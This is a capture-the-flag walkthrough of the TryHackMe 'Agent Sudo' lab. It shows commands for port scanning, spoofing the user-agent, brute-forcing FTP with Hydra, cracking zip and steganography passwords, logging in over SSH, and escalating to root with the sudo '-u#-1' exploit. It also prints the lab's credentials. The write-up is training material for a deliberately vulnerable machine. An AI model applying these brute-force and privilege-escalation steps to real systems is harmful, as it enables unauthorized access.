Agent Sudo
Hi Techies,
In this article, we will discuss about the Agent Sudo tryhackme machine. It involves some manual enumeration, FTP brute-forcing with Hydra, SSH, then privilege escalate with a sudo CVE vulnerability.
Deploy the vulnerable machine
Connect to VPN and check for the connectivity
Let’s start with the task
Task 1 :- Author Note
Deploy the machine
Task 2 :-Enumerate
We will check for the open ports using nmap
#nmap -sS -sV -O 10.10.237.205
- How many open ports?
3 open ports
2.How you redirect yourself to a secret page?
Since, port 80 is open, we will check with web server.
Here, we got a hint that user-agent is the secret page
3.What is the agent name?
There is a hint for this question, to try with “user-agent-C”
We will change the user agent with the help of burp
Intercept the web-server with burp
Here, we can find the host-name
We will change the user-agent to “C” & forward
Once we forward the intercept we can view the change in URL. Forward it again
Check with your web-server, we got the Agent C user is “chris”
Task 3
Done enumerate the machine? Time to brute your way out.
- FTP password
Since, we got the username, will try to brute-force it with hydra to get the password
#hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.237.205 -t4
Now we have the credentials for ftp. We will login using it.
#ftp 10.10.237.205
Username :- Chris
Password :- crystal
Here, we got three files. We will download it to our kali machine using “get” command
We will view the content from the file downloads
#cat To_agentJ.txt
2.Zip file password
We will extract the png extension using “binwalk”
#binwalk -e cutie.png
There is some zip files, will search for the content of zip file.
Check for the extracted directory.
Inside the extracted directory, we can see the zip file.
We will convert the .zip file to txt file using john(Provided as hint)
#zip2john 8702.zip >zip
We will check for the content of the converted text file
#cat zip
Since, the text file contains hash, we will crack it using john the ripper
#john zip
We found the zip file password is alien
3.steg password
We have another file of jpg.
In-order to extract the content of jpg file. We will use steghide command
Steghide ask for passphrase. So we will crack the password using stegcracker
#stegcracker cute-alien.jpg
We got the passphrase as Area51
We got the password, we will extract the jpg file
#steghide extract -sf cute-alien.jpg
The steghide extracted the jpg file & data is stored in “message.txt” file
We will view the extracted file
#cat message.txt
We found the user as “James” & password is “hackerrules!”
4.Who is the other agent (in full name)?
By viewing the content from message.txt file we got to know the username is “James”
5.SSH password
The password is “hackerrules!”
Task 4 :- Capture the user flag
You know the drill.
- What is the user flag?
We know the username & password for SSH. We will login with it, to find the user flag
#ssh james@10.10.237.205
We got user shell, we will find the user flag.
#cat user_flag.txt
2.What is the incident of the photo called?
We got another jpg. image for james user
I tried with stegcracker, but it throws error.
So i search the internet for the result.
Task 5 :- Privilege Escalation
Check for the permission for the user
#sudo -l
1.CVE number for the escalation (Format: CVE-xxxx-xxxx)
Search on the internet to find the result
To escalate the privileges, we got the exploit
#sudo -u#-1 /bin/bash
2.What is the root flag?
By escalating it we got the root access
#cat root.txt
3. (Bonus) Who is Agent R?
Deskel
Hope you enjoy reading this.Thank you
